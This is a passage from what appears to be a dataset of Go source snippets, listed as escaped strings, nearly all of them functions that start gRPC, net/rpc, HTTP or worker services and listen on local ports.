grpc.WithPerRPCCredentials(auth))\n\n\tvar threads *threadsClient.Client\n\tvar buckets *bucketsClient.Client\n\tvar netc *nc.Client\n\n\t// by default it goes to local threads now\n\thost := \"127.0.0.1:3006\"\n\n\tlog.Debug(\"Creating buckets client in \" + host)\n\tif b, err := bucketsClient.NewClient(host, opts...); err != nil {\n\t\tcmd.Fatal(err)\n\t} else {\n\t\tbuckets = b\n\t}\n\n\tlog.Debug(\"Creating threads client in \" + host)\n\tif t, err := threadsClient.NewClient(host, opts...); err != nil {\n\t\tcmd.Fatal(err)\n\t} else {\n\t\tthreads = t\n\t}\n\n\tif n, err := nc.NewClient(host, opts...); err != nil {\n\t\tcmd.Fatal(err)\n\t} else {\n\t\tnetc = n\n\t}\n\n\ttc.bucketsClient = buckets\n\ttc.threads = threads\n\ttc.netc = netc\n\n\ttc.isRunning = true\n\n\t// Attempt to connect to the Hub\n\t_, err := tc.getHubCtx(ctx)\n\tif err != nil {\n\t\tlog.Error(\"Could not connect to Textile Hub. Starting in offline mode.\", err)\n\t} else {\n\t\ttc.isConnectedToHub = true\n\t}\n\n\ttc.Ready <- true\n\treturn nil\n}", "func run(c context.Context, getCommands CommandFactory, daemonServices []DaemonService, sessionServices []trafficmgr.SessionService) error {\n\tcfg, err := client.LoadConfig(c)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to load config: %w\", err)\n\t}\n\tc = client.WithConfig(c, cfg)\n\tc = dgroup.WithGoroutineName(c, \"/\"+ProcessName)\n\tc, err = logging.InitContext(c, ProcessName, logging.RotateDaily, true)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Listen on domain unix domain socket or windows named pipe. The listener must be opened\n\t// before other tasks because the CLI client will only wait for a short period of time for\n\t// the socket/pipe to appear before it gives up.\n\tgrpcListener, err := client.ListenSocket(c, ProcessName, client.ConnectorSocketName)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer func() {\n\t\t_ = client.RemoveSocket(grpcListener)\n\t}()\n\tdlog.Debug(c, \"Listener opened\")\n\n\tdlog.Info(c, \"---\")\n\tdlog.Infof(c, \"Telepresence %s %s starting...\", titleName, client.DisplayVersion())\n\tdlog.Infof(c, \"PID is %d\", os.Getpid())\n\tdlog.Info(c, \"\")\n\n\t// Don't bother calling 'conn.Close()', it should remain open until we shut down, and just\n\t// prefer to let the OS close it when we exit.\n\n\tsr := scout.NewReporter(c, \"connector\")\n\tcliio := &broadcastqueue.BroadcastQueue{}\n\n\ts := &service{\n\t\tscout: sr,\n\t\tconnectRequest: make(chan *rpc.ConnectRequest),\n\t\tconnectResponse: make(chan *rpc.ConnectInfo),\n\t\tmanagerProxy: trafficmgr.NewManagerProxy(),\n\t\tloginExecutor: auth.NewStandardLoginExecutor(cliio, sr),\n\t\tuserNotifications: func(ctx context.Context) <-chan string { return cliio.Subscribe(ctx) },\n\t\ttimedLogLevel: log.NewTimedLevel(cfg.LogLevels.UserDaemon.String(), log.SetLevel),\n\t\tgetCommands: getCommands,\n\t}\n\tif err := logging.LoadTimedLevelFromCache(c, s.timedLogLevel, s.procName); err != nil {\n\t\treturn err\n\t}\n\n\tg := dgroup.NewGroup(c, dgroup.GroupConfig{\n\t\tSoftShutdownTimeout: 2 * time.Second,\n\t\tEnableSignalHandling: true,\n\t\tShutdownOnNonError: true,\n\t})\n\n\tquitOnce := sync.Once{}\n\ts.quit = func() {\n\t\tquitOnce.Do(func() {\n\t\t\tg.Go(\"quit\", func(_ context.Context) error {\n\t\t\t\tcliio.Close()\n\t\t\t\treturn nil\n\t\t\t})\n\t\t})\n\t}\n\n\tg.Go(\"server-grpc\", func(c context.Context) (err error) {\n\t\topts := []grpc.ServerOption{}\n\t\tcfg := client.GetConfig(c)\n\t\tif !cfg.Grpc.MaxReceiveSize.IsZero() {\n\t\t\tif mz, ok := cfg.Grpc.MaxReceiveSize.AsInt64(); ok {\n\t\t\t\topts = append(opts, grpc.MaxRecvMsgSize(int(mz)))\n\t\t\t}\n\t\t}\n\t\ts.svc = grpc.NewServer(opts...)\n\t\trpc.RegisterConnectorServer(s.svc, s)\n\t\tmanager.RegisterManagerServer(s.svc, s.managerProxy)\n\t\tfor _, ds := range daemonServices {\n\t\t\tdlog.Infof(c, \"Starting additional daemon service %s\", ds.Name())\n\t\t\tif err := ds.Start(c, sr, s.svc, s.withSession); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\n\t\tsc := &dhttp.ServerConfig{Handler: s.svc}\n\t\tdlog.Info(c, \"gRPC server started\")\n\t\tif err = sc.Serve(c, grpcListener); err != nil && c.Err() != nil {\n\t\t\terr = nil // Normal shutdown\n\t\t}\n\t\tif err != nil {\n\t\t\tdlog.Errorf(c, \"gRPC server ended with: %v\", err)\n\t\t} else {\n\t\t\tdlog.Debug(c, \"gRPC server ended\")\n\t\t}\n\t\treturn err\n\t})\n\n\tg.Go(\"config-reload\", s.configReload)\n\tg.Go(\"session\", func(c context.Context) error {\n\t\treturn s.manageSessions(c, sessionServices)\n\t})\n\n\t// background-systema runs a localhost HTTP server for handling callbacks from the\n\t// Ambassador Cloud login flow.\n\tg.Go(\"background-systema\", s.loginExecutor.Worker)\n\n\t// background-metriton is the goroutine that handles all telemetry reports, so that calls to\n\t// metriton don't block the functional goroutines.\n\tg.Go(\"background-metriton\", s.scout.Run)\n\n\terr = g.Wait()\n\tif err != nil {\n\t\tdlog.Error(c, err)\n\t}\n\treturn err\n}", "func (s *Service) run() {\n\n\t// Create a communicator for sending and receiving packets.\n\tcommunicator := comm.NewCommunicator(s.config.PollInterval, s.config.Port)\n\tdefer communicator.Stop()\n\n\t// Create a ticker for sending pings.\n\tpingTicker := time.NewTicker(s.config.PingInterval)\n\tdefer pingTicker.Stop()\n\n\t// Create a ticker for timeout checks.\n\tpeerTicker := time.NewTicker(s.config.PeerTimeout)\n\tdefer peerTicker.Stop()\n\n\t// Create the packet that will be sent to all peers.\n\tpkt := &comm.Packet{\n\t\tID: s.config.ID,\n\t\tUserData: s.config.UserData,\n\t}\n\n\t// Continue processing events until explicitly stopped.\n\tfor {\n\t\tselect {\n\t\tcase p := <-communicator.PacketChan:\n\t\t\ts.processPacket(p)\n\t\tcase <-pingTicker.C:\n\t\t\tcommunicator.Send(pkt)\n\t\tcase <-peerTicker.C:\n\t\t\ts.processPeers()\n\t\tcase <-s.stopChan:\n\t\t\treturn\n\t\t}\n\t}\n}", "func (s *JRPCServer) Start() {\n\thttpCall := s.httpSrv.On(s.endpointURL)\n\thttpCall.Forever()\n\thttpCall.handlerFunc = func(w http.ResponseWriter, req *http.Request) error {\n\t\t// ctx := context.Background()\n\t\ts.guard.Lock()\n\t\tdefer s.guard.Unlock()\n\t\tjReq := btcjson.Request{}\n\t\tbuf, err := ioutil.ReadAll(req.Body)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"unable to decode jRPC request: %v\", err)\n\t\t}\n\t\terr = req.Body.Close()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\treq.Body = ioutil.NopCloser(bytes.NewBuffer(buf))\n\t\tmustUnmarshal(buf, &jReq)\n\t\tcall, err := s.findCall(jReq)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\t// put unmarshalled JRPC request into a context\n\t\tctx := context.WithValue(req.Context(), jRPCRequestKey, jReq)\n\t\treturn call.execute(w, req.WithContext(ctx))\n\t}\n\ts.httpSrv.Start()\n}", "func Run() {\n\tgo listen()\n}", "func (s *GrpcServer) startGrpcService() {\n\t// Start listening for requests\n\treflection.Register(s.server)\n\tlogrus.Infof(\"%s gRPC Server ready on %s\", s.name, s.Address())\n\twaitForServer := make(chan bool)\n\ts.goServe(waitForServer)\n\t<-waitForServer\n\ts.running = true\n}", "func main() {\n\tflag.Parse()\n\tfmt.Println(\"start the program\")\n\t// fmt.Println(*serverAddr)\n\n\tfor {\n\t\t// start the app\n\t\twaitc := make(chan struct{}) // a wait lock\n\n\t\t// start the server thread\n\t\tgo func() {\n\t\t\tfmt.Println(\"start the server\")\n\t\t\tserver.InitFileServer()\n\t\t\tdefer close(waitc)\n\t\t}()\n\n\t\t// start the client thread\n\t\t// go func() {\n\t\t// \tfor {\n\t\t// \t\tmsg := <-msgc // a message to send\n\t\t// \t\tclient.InitChatClient(*myTitle, serverAddr)\n\n\t\t// \t\terr := client.Chat(msg)\n\t\t// \t\tif err != nil {\n\t\t// \t\t\t// restart the client\n\t\t// \t\t\tfmt.Printf(\"send Err: %v\", err)\n\t\t// \t\t}\n\t\t// \t}\n\t\t// }()\n\n\t\t// start the input thread\n\t\t// go input()\n\n\t\t<-waitc\n\t\t// finished in this round restart the app\n\t\tfmt.Println(\"restart the app\")\n\t}\n}", "func (w *Worker) Start() {\n\tw.commandsPipe = NewCommandPipe()\n\tw.responsesPipe = NewResponsePipe(w.maxResponsePipeBufferSize)\n\tvar err error\n\tw.cmd = exec.Command(w.commandName, w.args...)\n\tw.responsesPipe.Register(w.cmd)\n\tw.commandsPipe.Register(w.cmd)\n\n\tch := w.responsesPipe.Channel()\n\n\tgo func() {\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase data := <-ch:\n\t\t\t\tlog.Print(\"GOT FROM PIPE \", data)\n\t\t\t\tvar ans WorkerStatus\n\t\t\t\tvar err error\n\t\t\t\terr = json.Unmarshal([]byte(data), &ans)\n\t\t\t\tlog.Print(\"DECODED FROM PIPE: \", ans)\n\t\t\t\tif err != nil {\n\t\t\t\t\tans.TaskID = w.taskID\n\t\t\t\t\tans.worker = w\n\t\t\t\t\tans.Error = err.Error()\n\t\t\t\t\t// TODO\n\t\t\t\t\tlog.Print(\"ERROR: failed to parse worker response: \", err)\n\n\t\t\t\t} else {\n\t\t\t\t\tans.TaskID = w.taskID\n\t\t\t\t\tans.worker = w\n\t\t\t\t}\n\t\t\t\tw.lastEvent = ans\n\t\t\t\tw.workerEvent <- &ans\n\n\t\t\t}\n\t\t}\n\t}()\n\terr = w.cmd.Start()\n\tif err != nil {\n\t\tlog.Print(\"ERROR: \", err) // TODO\n\t}\n\tgo func() {\n\t\terr := w.cmd.Wait()\n\t\tif err != nil {\n\t\t\tswitch terr := err.(type) {\n\t\t\tcase *exec.ExitError:\n\t\t\t\tw.workerEvent <- &WorkerStatus{\n\t\t\t\t\tTaskID: w.taskID,\n\t\t\t\t\tworker: w,\n\t\t\t\t\tError: terr.Error(), // TODO\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\tw.workerEvent <- &WorkerStatus{\n\t\t\t\t\tTaskID: w.taskID,\n\t\t\t\t\tworker: w,\n\t\t\t\t\tError: err.Error(),\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}()\n\n}", "func main() {\n\tvar addr string\n\tflag.StringVar(&addr, \"e\", \":4040\", \"service address endpoint\")\n\tflag.Parse()\n\n\t// create local addr for socket\n\tladdr, err := net.ResolveTCPAddr(\"tcp\", addr)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tos.Exit(1)\n\t}\n\n\t// announce service using ListenTCP\n\t// which a TCPListener.\n\tl, err := net.ListenTCP(\"tcp\", laddr)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tos.Exit(1)\n\t}\n\tdefer l.Close()\n\tfmt.Println(\"listening at (tcp)\", laddr.String())\n\n\t// req/response loop\n\tfor {\n\t\t// use TCPListener to block and wait for TCP\n\t\t// connection request using AcceptTCP which creates a TCPConn\n\t\tconn, err := l.AcceptTCP()\n\t\tif err != nil {\n\t\t\tfmt.Println(\"failed to accept conn:\", err)\n\t\t\tconn.Close()\n\t\t\tcontinue\n\t\t}\n\t\tfmt.Println(\"connected to: \", conn.RemoteAddr())\n\n\t\tgo handleConnection(conn)\n\t}\n}", "func (w *rpcServer) Start() error {\n\treceiver, err := w.session.NewReceiver(\n\t\tamqp.LinkSourceAddress(queueAddress(w.queue)),\n\t\tamqp.LinkCredit(w.concurrency),\n\t\tamqp.LinkSourceDurability(amqp.DurabilityUnsettledState),\n\t\tamqp.LinkSourceExpiryPolicy(amqp.ExpiryNever),\n\t)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tw.stopping = false\n\tmessages := make(chan *amqp.Message)\n\n\tgo w.receiveMessages(receiver, messages)\n\tgo w.processIncomingMessage(messages)\n\n\treturn nil\n}", "func (e *Engine) syncRPC() {\n\t// TODO(jsing): Make this default to IPv6, if configured.\n\taddr := &net.TCPAddr{\n\t\tIP: e.config.Node.IPv4Addr,\n\t\tPort: e.config.SyncPort,\n\t}\n\tln, err := net.ListenTCP(\"tcp\", addr)\n\tif err != nil {\n\t\tlog.Fatalf(\"Listen failed: %v\", err)\n\t}\n\n\tgo e.syncServer.serve(ln)\n\n\t<-e.shutdownRPC\n\tln.Close()\n\te.shutdownRPC <- true\n}", "func callWorker(worker, name string, args interface{}, reply interface{}) bool {\n\treturn call(worker, \"RPCWorker.\"+name, args, reply)\n}", "func startPollWorker(site *ElectionSite) *pollWorker {\n\n\tworker := &pollWorker{site: site,\n\t\tballot: nil,\n\t\tkillch: make(chan bool, 1), // make sure sender won't block\n\t\tlistench: make(chan *Ballot, 1)} // make sure sender won't block\n\n\tgo worker.listen()\n\n\treturn worker\n}", "func main() {\n\tvar (\n\t\trepository = storage.NewInMemory()\n\t\tportServer = service.NewPortServer(repository)\n\t)\n\n\tlistener, err := net.Listen(\"tcp\", fmt.Sprintf(\":%d\", port))\n\tif err != nil {\n\t\tlog.Fatalf(\"cannot start the server: %s\", err)\n\t}\n\n\tgrpcServer := grpc.NewServer()\n\n\tproto.RegisterStorageServer(grpcServer, portServer)\n\n\tlog.Printf(\"starting GRPC server on %s\", listener.Addr().String())\n\tif err := grpcServer.Serve(listener); err != nil {\n\t\tlog.Fatalf(\"failed to start the server: %s\", err)\n\t}\n}", "func (s *Service) Run(setupBody ServiceSetupCallback) error {\n\tif !atomic.CompareAndSwapInt32(&s.running, 0, 1) {\n\t\treturn ErrAlreadyRunning\n\t}\n\tdefer func() {\n\t\tatomic.StoreInt32(&s.running, 0)\n\t}()\n\n\ts.l.Lock()\n\tif s.stopped {\n\t\ts.l.Unlock()\n\t\treturn io.EOF\n\t}\n\ts.l.Unlock()\n\n\tconn, err := net.Dial(\"tcp\", s.url.Host)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer conn.Close()\n\n\tconn.(*net.TCPConn).SetNoDelay(true)\n\n\treq, _ := http.NewRequest(\"RPCCONNECT\", s.url.String(), nil)\n\treq.SetBasicAuth(s.user, s.pwd)\n\treq.Header.Set(\"User-Agent\", userAgent)\n\terr = req.Write(conn)\n\tif err != nil {\n\t\treturn err\n\t}\n\tconnr := bufio.NewReader(conn)\n\trwc := &minirwc{Conn: conn, bufreader: connr}\n\tresp, err := http.ReadResponse(connr, req)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif resp.StatusCode != 200 {\n\t\tif resp.StatusCode == 401 {\n\t\t\treturn ErrRevRpcUnauthorized\n\t\t}\n\t\tvar message = \"\"\n\t\tif resp.StatusCode == 400 {\n\t\t\tbody, err := ioutil.ReadAll(resp.Body)\n\t\t\tif err == nil {\n\t\t\t\tmessage = string(body)\n\t\t\t}\n\t\t\tresp.Body.Close()\n\t\t}\n\t\treturn &HttpError{StatusCode: resp.StatusCode, Message: message}\n\t}\n\n\trpcServer := rpc.NewServer()\n\terr = setupBody(rpcServer)\n\trpcServer.RegisterName(\"revrpc\", &RevrpcSvc{service: s})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tcodec := newJsonServerCodec(rwc)\n\n\ts.l.Lock()\n\tif s.stopped {\n\t\tcodec.Close()\n\t\ts.l.Unlock()\n\t\treturn io.EOF\n\t}\n\ts.codec = codec\n\ts.l.Unlock()\n\n\trpcServer.ServeCodec(codec)\n\n\treturn io.EOF\n}", "func Run() error {\n\tgo StartServer()\n\n\tlis, err := net.Listen(\"tcp\", \":50051\")\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to listen: %v\", err)\n\t}\n\n\ts := grpc.NewServer()\n\n\tklessapi.RegisterKlessAPIServer(s, &apiserver.APIServer{})\n\tif err := s.Serve(lis); err != nil {\n\t\tlog.Fatalf(\"failed to serve: %v\", err)\n\t}\n\treturn nil\n}", "func (w *worker) start() {\n\tgo func() {\n\t\tresult, err := w.resolve()\n\t\tfor req := range w.reqs {\n\t\t\treq.SetResult(result, err)\n\t\t}\n\t\tw.joinChan <- true\n\t}()\n}", "func startServer(config types.Config, v *Vibranium) *grpc.Server {\n\ts, err := net.Listen(\"tcp\", config.Bind)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\topts := []grpc.ServerOption{grpc.MaxConcurrentStreams(100)}\n\tgrpcServer := grpc.NewServer(opts...)\n\tpb.RegisterCoreRPCServer(grpcServer, v)\n\tgo grpcServer.Serve(s)\n\tlog.Info(\"Cluster started successfully.\")\n\treturn grpcServer\n}", "func main() {\n\tflag.Parse()\n\tfmt.Println(\"start the program\")\n\n\t// go myServer()\n\t// go myClient()\n\n\tfor {\n\t\t// start the app\n\t\twaitc := make(chan struct{}) // a wait lock\n\n\t\t// start the server thread\n\t\tgo func() {\n\t\t\tfmt.Println(\"start the server\")\n\t\t\tserver.InitFileServer()\n\t\t\tdefer close(waitc)\n\t\t}()\n\n\t\t// start the client thread\n\t\t// go func() {\n\t\t// \t// for {\n\t\t// \tserverAddr, server := filesource.SearchAddressForThefile(\"Liben.jpg\")\n\t\t// \tfmt.Println(*serverAddr)\n\t\t// \tfmt.Println(*server)\n\t\t// \tclient.InitFileClient(serverAddr, server)\n\t\t// \tclient.DownloadFile(\"Liben.jpg\")\n\t\t// \t// }\n\t\t// }()\n\n\t\t// start the input thread\n\t\t// go input()\n\n\t\t<-waitc\n\t\t// finished in this round restart the app\n\t\tfmt.Println(\"restart the app\")\n\t}\n}", "func main() {\n\tlis, err := net.Listen(\"tcp\", port)\n\tif err != nil {\n\t\tlog.Fatalf(\"Failed to listen on port [%s]: %v\", port, err)\n\t}\n\ts := grpc.NewServer()\n\tpb.RegisterColorGeneratorServer(s, &server{})\n\tif err := s.Serve(lis); err != nil {\n\t\tlog.Fatalf(\"Failed to start the server: %v\", err)\n\t}\n}", "func (m *Master) server() {\n\trpc.Register(m)\n\trpc.HandleHTTP()\n\tos.Create(\"mr-socket\")\n\n\tl, e := net.Listen(\"tcp\", \"0.0.0.0:8080\")\n\tif e != nil {\n\t\tlog.Fatal(\"listen error:\", e)\n\t}\n\tlog.Printf(\"Server is running at %s\\n\", l.Addr().String())\n\tgo http.Serve(l, nil)\n}", "func main() {\n initApplicationConfiguration()\n runtime.GOMAXPROCS(2) // in order for the rpc and http servers to work in parallel\n\n go servers.StartRPCServer()\n servers.StartHTTPServer()\n}", "func main() {\n\tport := os.Getenv(\"PORT\")\n\tlog.Printf(\"Starting a device model grpc service in port \" + port)\n\tlis, err := net.Listen(\"tcp\", \":\"+port)\n\n\tif err != nil {\n\t\tlog.Fatalf(\"faild to listen: %v\", err)\n\t}\n\tctn, err := registry.NewContainer()\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to build container: %v\", err)\n\t}\n\n\tserver := grpc.NewServer()\n\t// Start the device model service rpc\n\trpc.Apply(server, ctn)\n\n\tgo func() {\n\t\tlog.Printf(\"start grpc server port: %s\", port)\n\t\tserver.Serve(lis)\n\t}()\n\n\tquit := make(chan os.Signal)\n\tsignal.Notify(quit, os.Interrupt)\n\t<-quit\n\tlog.Println(\"stopping grpc server...\")\n\tserver.GracefulStop()\n\tctn.Clean()\n}", "func StartWorker(g handlers.Gwp) {\n\tapp.Logger(nil).Info(\"START\")\n\tfitchers, err := models.GetFetchers(app.API.DB)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\tapp.Logger(nil).Info(\"URL: \", fitchers)\n\n\tfor _, fitcher := range fitchers {\n\t\tAddFetcher(fitcher.Id, fitcher.Url, fitcher.Interval)\n\t}\n\n}", "func RPC_Service() {\n\tapi := new(API)\n\terr := rpc.Register(api)\n\tif err != nil {\n\t\tlog.Fatal(\"error registering API\", err)\n\t}\n\trpc.HandleHTTP()\n\n\tlistener, err := net.Listen(\"tcp\", \"127.0.0.1:8080\")\n\n\tif err != nil {\n\t\tlog.Fatal(\"Listener error\", err)\n\t}\n\tlog.Printf(\"serving rpc on port %d\", 8080)\n\thttp.Serve(listener, nil)\n\n\tif err != nil {\n\t\tlog.Fatal(\"error serving: \", err)\n\t}\n}", "func main() {\n\tlogrus.SetFormatter(&logrus.TextFormatter{\n\t\tForceColors: true,\n\t\tFullTimestamp: true,\n\t})\n\tmlog := logrus.WithFields(logrus.Fields{\n\t\t\"component\": componentName,\n\t\t\"version\": env.Version(),\n\t})\n\n\tgrpc_logrus.ReplaceGrpcLogger(mlog.WithField(\"component\", componentName+\"_grpc\"))\n\tmlog.Infof(\"Starting %s\", componentName)\n\n\tgrpcServer, err := createGRPCServer(mlog)\n\tif err != nil {\n\t\tmlog.WithError(err).Fatal(\"failed to create grpc server\")\n\t}\n\t// Start go routines\n\tgo handleExitSignals(grpcServer, mlog)\n\tserveGRPC(env.ServiceAddr(), grpcServer, mlog)\n}", "func (s *Server) listen(listener net.Listener) {\n\tfor {\n\t\t// Accept a connection\n\t\tconn, err := listener.Accept()\n\t\tif err != nil {\n\t\t\tif s.shutdown {\n\t\t\t\treturn\n\t\t\t}\n\t\t\ts.logger.Printf(\"[ERR] consul.rpc: failed to accept RPC conn: %v\", err)\n\t\t\tcontinue\n\t\t}\n\n\t\tgo s.handleConn(conn, false)\n\t\tmetrics.IncrCounter([]string{\"rpc\", \"accept_conn\"}, 1)\n\t}\n}", "func (server *RPCServer) Start() {\n\trpcServer := rpc.NewServer()\n\trpcServer.RegisterName(\"Server\", server.handler) //register the handler's methods as the server\n\n\thttpServer := &http.Server{}\n\thttpServer.Handler = rpcServer\n\n\tgo httpServer.Serve(server.listener)\n}", "func main() {\n\n\tconst apiName = \"handle1\"\n\ttStr := `_` + I.ToS(time.Now().UnixNano())\n\tif len(os.Args) > 1 {\n\t\tapp := fiber.New()\n\n\t\tmode := os.Args[1]\n\t\tswitch mode {\n\t\tcase `apiserver`:\n\t\t\tapp.Get(\"/\", func(c *fiber.Ctx) error {\n\t\t\t\treturn c.SendString(I.ToS(rand.Int63()) + tStr)\n\t\t\t})\n\n\t\tcase `apiproxy`:\n\t\t\t// connect as request on request-reply\n\n\t\t\tconst N = 8\n\t\t\tcounter := uint32(0)\n\t\t\tncs := [N]*nats.Conn{}\n\t\t\tmutex := sync.Mutex{}\n\t\t\tconn := func() *nats.Conn {\n\t\t\t\tidx := atomic.AddUint32(&counter, 1) % N\n\t\t\t\tnc := ncs[idx]\n\t\t\t\tif nc != nil {\n\t\t\t\t\treturn nc\n\t\t\t\t}\n\t\t\t\tmutex.Lock()\n\t\t\t\tdefer mutex.Unlock()\n\t\t\t\tif ncs[idx] != nil {\n\t\t\t\t\treturn ncs[idx]\n\t\t\t\t}\n\t\t\t\tnc, err := nats.Connect(\"127.0.0.1\")\n\t\t\t\tL.PanicIf(err, `nats.Connect`)\n\t\t\t\tncs[idx] = nc\n\t\t\t\treturn nc\n\t\t\t}\n\n\t\t\tdefer func() {\n\t\t\t\tfor _, nc := range ncs {\n\t\t\t\t\tif nc != nil {\n\t\t\t\t\t\tnc.Close()\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}()\n\n\t\t\t// handler\n\t\t\tapp.Get(\"/\", func(c *fiber.Ctx) error {\n\t\t\t\tmsg, err := conn().Request(apiName, []byte(I.ToS(rand.Int63())), time.Second)\n\t\t\t\tif L.IsError(err, `nc.Request`) {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\t// Use the response\n\t\t\t\treturn c.SendString(string(msg.Data))\n\t\t\t})\n\t\tdefault:\n\t\t}\n\n\t\tlog.Println(mode + ` started ` + tStr)\n\t\tlog.Fatal(app.Listen(\":3000\"))\n\n\t} else {\n\t\t// worker\n\t\tlog.Println(`worker started ` + tStr)\n\n\t\tnc, err := nats.Connect(\"127.0.0.1\")\n\t\tL.PanicIf(err, `nats.Connect`)\n\t\tdefer nc.Close()\n\n\t\tconst queueName = `myqueue`\n\n\t\t//// connect as reply on request-reply (sync)\n\t\t//sub, err := nc.QueueSubscribeSync(apiName, queueName)\n\t\t//L.PanicIf(err, `nc.SubscribeSync`)\n\t\t//\n\t\t////Wait for a message\n\t\t//for {\n\t\t//\tmsg, err := sub.NextMsgWithContext(context.Background())\n\t\t//\tL.PanicIf(err, `sub.NextMsgWithContext`)\n\t\t//\n\t\t//\terr = msg.Respond([]byte(string(msg.Data) + tStr))\n\t\t//\tL.PanicIf(err, `msg.Respond`)\n\t\t//}\n\n\t\t//// channel (async) -- error slow consumer\n\t\t//ch := make(chan *nats.Msg, 1)\n\t\t//_, err = nc.ChanQueueSubscribe(apiName, queueName, ch)\n\t\t//L.PanicIf(err, `nc.ChanSubscribe`)\n\t\t//for {\n\t\t//\tselect {\n\t\t//\tcase msg := <-ch:\n\t\t//\t\tL.PanicIf(msg.Respond([]byte(string(msg.Data)+tStr)), `msg.Respond`)\n\t\t//\t}\n\t\t//}\n\n\t\t// callback (async)\n\t\t_, err = nc.QueueSubscribe(apiName, queueName, func(msg *nats.Msg) {\n\t\t\tres := string(msg.Data) + tStr\n\t\t\tL.PanicIf(msg.Respond([]byte(res)), `msg.Respond`)\n\t\t})\n\n\t\tvar line string\n\t\tfmt.Scanln(&line) // wait for input so not exit\n\t}\n}", "func (s *Server) startGRPC() {\n\tlistener, err := net.Listen(\"tcp\", s.grpcAddr)\n\tif err != nil {\n\t\tlog.Fatalf(\"Error creating listen socket: %v\", err)\n\t}\n\n\tgrpcServer := s.service.GRPCServer()\n\n\t// Set up graceful shutdown\n\tgo func() {\n\t\t<-s.ctx.Done()\n\t\tlog.Printf(\"Shutting down gRPC interface\")\n\t\tgrpcServer.GracefulStop()\n\t}()\n\n\t// Start gRPC server\n\tgo func() {\n\t\tlog.Printf(\"Starting gRPC at '%s'\", s.grpcAddr)\n\t\ts.grpcStarted.Done()\n\t\terr = grpcServer.Serve(listener)\n\t\tlog.Printf(\"Starting 2\")\n\n\t\tif err != nil {\n\t\t\tlog.Printf(\"gRPC interface returned error: %v\", err)\n\t\t}\n\t\tlog.Printf(\"gRPC interface: shut down\")\n\t\ts.grpcStopped.Done()\n\t}()\n\n}", "func listenClientRPCs() {\n\tkvServer := rpc.NewServer()\n\tkv := new(KVServer)\n\tkvServer.Register(kv)\n\tl, err := net.Listen(\"tcp\", listenClientIpPort)\n\tcheckError(\"Error in listenClientRPCs(), net.Listen()\", err, true)\n\tfmt.Println(\"Listening for client RPC calls on:\", listenClientIpPort)\n\tfor {\n\t\tconn, err := l.Accept()\n\t\tcheckError(\"Error in listenClientRPCs(), l.Accept()\", err, true)\n\t\tkvServer.ServeConn(conn)\n\t}\n}", "func run() {\n\tlogs.Start()\n\n\t// Send all data for the centralized database\n\tgo store.push()\n\tstore.Lock()\n\tdefer store.Unlock()\n\n\t// Creating the listener\n\tconfigData := config.GetConfig()\n\twatcher(configData)\n}", "func listen(addr string, srcvr ...interface{}) error {\n\tvar err error\n\tfor _, v := range srcvr {\n\t\tif err = rpc.Register(v); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tl, err := net.Listen(\"tcp\", addr)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfor {\n\t\tconn, err := l.Accept()\n\t\tif err != nil {\n\t\t\tlog.Print(\"Error: accept rpc connection\", err.Error())\n\t\t\tcontinue\n\t\t}\n\t\tgo func(conn net.Conn) {\n\t\t\tdefer func() {\n\t\t\t\tif err := recover(); err != nil {\n\t\t\t\t\tlog.Println(\"Error: Rpc Call Recover\", err, string(debug.Stack()))\n\t\t\t\t}\n\t\t\t}()\n\t\t\tbuf := bufio.NewWriter(conn)\n\t\t\tsrv := &gobServerCodec{\n\t\t\t\trwc: conn,\n\t\t\t\tdec: gob.NewDecoder(conn),\n\t\t\t\tenc: gob.NewEncoder(buf),\n\t\t\t\tencBuf: buf,\n\t\t\t}\n\t\t\tdefer srv.Close()\n\t\t\terr = rpc.ServeRequest(srv)\n\t\t\tif err != nil {\n\t\t\t\tlog.Print(\"Error: rpc server\", err.Error())\n\t\t\t}\n\t\t}(conn)\n\t}\n}", "func main() {\n handleRequests()\n}", "func (pr *Prober) start(ctx context.Context) {\n\t// Start the default server\n\tsrv := &http.Server{}\n\tgo func() {\n\t\t<-ctx.Done()\n\t\tsrv.Close()\n\t}()\n\tgo func() {\n\t\tsrv.Serve(pr.serverListener)\n\t\tos.Exit(1)\n\t}()\n\n\tdataChan := make(chan *metrics.EventMetrics, 1000)\n\n\tgo func() {\n\t\tvar em *metrics.EventMetrics\n\t\tfor {\n\t\t\tem = <-dataChan\n\t\t\tvar s = em.String()\n\t\t\tif len(s) > logger.MaxLogEntrySize {\n\t\t\t\tglog.Warningf(\"Metric entry for timestamp %v dropped due to large size: %d\", em.Timestamp, len(s))\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// Replicate the surfacer message to every surfacer we have\n\t\t\t// registered. Note that s.Write() is expected to be\n\t\t\t// non-blocking to avoid blocking of EventMetrics message\n\t\t\t// processing.\n\t\t\tfor _, surfacer := range pr.surfacers {\n\t\t\t\tsurfacer.Write(context.Background(), em)\n\t\t\t}\n\t\t}\n\t}()\n\n\t// Start a goroutine to export system variables\n\tgo sysvars.Start(ctx, dataChan, time.Millisecond*time.Duration(pr.c.GetSysvarsIntervalMsec()), pr.c.GetSysvarsEnvVar())\n\n\t// Start servers, each in its own goroutine\n\tfor _, s := range pr.Servers {\n\t\tgo s.Start(ctx, dataChan)\n\t}\n\n\t// Start RDS server if 